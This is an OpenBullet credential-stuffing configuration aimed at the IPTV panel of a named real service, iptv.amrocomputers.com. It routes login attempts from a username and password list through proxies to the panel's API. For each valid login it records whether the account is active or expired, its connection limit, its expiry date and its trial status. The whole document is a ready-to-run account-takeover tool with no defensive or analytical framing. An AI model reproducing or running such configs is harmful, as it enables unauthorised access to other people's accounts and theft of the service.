[SETTINGS]
{
  "Name": "amrocomputers",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-19T02:37:43.6494145+02:00",
  "AdditionalInfo": "Thanks to demiurgo for the panel_api method, LethalLuck for his initial work.",
  "Author": "LethalLuck / demiurgo / sp6off",
  "Version": "1.3.7 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "http://iptv.amrocomputers.com:8000/panel_api.php?username=<USER>&password=<PASS>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"auth\":1" 
  KEYCHAIN Failure OR 
    KEY "{\"auth\":0}" 

#STATUS PARSE "<SOURCE>" LR "\"status\":\"" "\"," -> CAP "Status" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Status>" EqualTo "Active" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Status>" EqualTo "Expired" 

#CONNECTIONS PARSE "<SOURCE>" LR "\"max_connections\":\"" "\"" -> CAP "CONNECTIONS" 

#EXPIRE PARSE "<SOURCE>" LR "\",\"exp_date\":\"" "\"" -> VAR "EXPIRE" 

FUNCTION UnixTimeToDate "<EXPIRE>" -> CAP "EXPIRE" 

#TRIAL PARSE "<SOURCE>" LR "\",\"is_trial\":\"" "\"" -> CAP "TRIAL" 

